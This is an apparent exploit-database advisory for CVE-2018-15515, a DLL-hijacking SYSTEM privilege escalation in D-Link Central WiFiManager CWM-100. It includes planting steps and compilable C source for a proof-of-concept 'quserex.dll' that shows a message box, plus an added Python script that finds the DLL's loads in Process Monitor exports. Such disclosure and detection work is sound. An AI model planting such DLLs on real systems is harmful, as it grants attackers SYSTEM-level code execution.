D-LINK Central WifiManager (CWM 100) 1.03 r0098 DLL Hijacking Exploit

2018-11-09T00:00:00
ID 1337DAY-ID-31560
Type zdt
Reporter hyp3rlinx
Modified 2018-11-09T00:00:00

Description

D-Link Central WiFiManager CWM-100 version 1.03 r0098 devices will load a trojan horse "quserex.dll" and will create a new thread running with SYSTEM integrity.

                                        
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SYSTEM-PRIVILEGE-ESCALATION.txt
[+] ISR: ApparitionSec          
 

***Greetz: indoushka | Eduardo B.***



[Vendor]
us.dlink.com


[Product]
D-LINK Central WifiManager (CWM 100)
Version 1.03 r0098
http://us.dlink.com/products/business-solutions/central-wifimanager-software-controller/

D-Link's free Central WiFiManager is a web-based wireless Access Point management tool, enabling you to create and manage multi-site, multi-tenancy wireless networks.


[Vulnerability Type]
Trojan File SYSTEM Privilege Escalation


[Affected Component]
"quserex.dll"


[CVE Reference]
CVE-2018-15515


[Security Issue]
D-Link Central WiFiManager CWM-100 1.03 r0098 devices will load a Trojan horse "quserex.dll" and will create a new thread running with SYSTEM integrity.


[Impact]
Code Execution as SYSTEM


[Exploit/POC]
1) Create a 32-bit DLL named "quserex.dll" and place it in the "CaptivelPortal.exe" directory under the DLINK directory

2) Restart the service "CaptivelPortal"

3) Proof: examine using Process Monitor (Sysinternals)


#include <windows.h>

/* hyp3rlinx */

/*
gcc -c -m32 quserex.c
gcc -shared -m32 -o quserex.dll quserex.o
*/

/* Harmless marker: shows a message box from the process that loaded the DLL. */
void executo(){
  MessageBox(NULL, "Enjoy ur SYSTEM Integrity!", ":)", MB_OK);
}

/* The loader calls DllMain for each notification below; every case runs executo(). */
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved){
  switch(fdwReason){
    case DLL_PROCESS_ATTACH:{
      executo();
      break;
    }
    case DLL_PROCESS_DETACH:{
      executo();
      break;
    }
    case DLL_THREAD_ATTACH:{
      executo();
      break;
    }
    case DLL_THREAD_DETACH:{
      executo();
      break;
    }
  }
  return TRUE;
}
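
[Added example: Process Monitor triage]
Step 3 above confirms the load with Process Monitor. The following Python is an added example, not part of the original advisory or its PoC: it triages a Procmon CSV export for events on "quserex.dll". It assumes Procmon's default export columns; the sample capture, its install path, PIDs and times are constructed placeholders.

```python
import csv
import io
import ntpath

# Names from the advisory; columns follow Process Monitor's default CSV export.
SERVICE_EXE = "captivelportal.exe"
DLL_NAME = "quserex.dll"
SYSTEM_DIRS = ("c:\\windows\\system32", "c:\\windows\\syswow64")

# Constructed sample capture. The install path is a placeholder, not the
# product's real path, and the PIDs and times are made up.
SAMPLE_CSV = r'''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:01:02.10","CaptivelPortal.exe","2044","CreateFile","C:\PLACEHOLDER\DLINK\quserex.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:05:40.00","cmd.exe","3120","WriteFile","C:\PLACEHOLDER\DLINK\quserex.dll","SUCCESS","Offset: 0, Length: 4,096"
"10:06:11.30","CaptivelPortal.exe","4312","Load Image","C:\PLACEHOLDER\DLINK\quserex.dll","SUCCESS","Image Base: 0x6f000000"
"10:06:11.31","CaptivelPortal.exe","4312","Load Image","C:\Windows\SysWOW64\kernel32.dll","SUCCESS","Image Base: 0x75000000"
'''


def triage(csv_text):
    """Return (kind, process, pid, path) for each event that touches quserex.dll."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        path = row["Path"].lower()
        if ntpath.basename(path) != DLL_NAME:
            continue
        op, result = row["Operation"], row["Result"]
        from_service = row["Process Name"].lower() == SERVICE_EXE
        in_system_dir = ntpath.dirname(path) in SYSTEM_DIRS
        if op == "WriteFile" and result == "SUCCESS":
            kind = "dll-written"          # any process dropping the file
        elif from_service and op == "CreateFile" and result == "NAME NOT FOUND":
            kind = "probe-miss"           # service looked for the DLL, none present
        elif from_service and op == "Load Image" and result == "SUCCESS" and not in_system_dir:
            kind = "loaded-outside-system-dir"
        else:
            continue
        findings.append((kind, row["Process Name"], row["PID"], row["Path"]))
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_CSV):
        print(*finding, sep=" | ")
```

When reading a real export from disk, open it with encoding "utf-8-sig" so a leading byte-order mark does not end up in the first column name.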
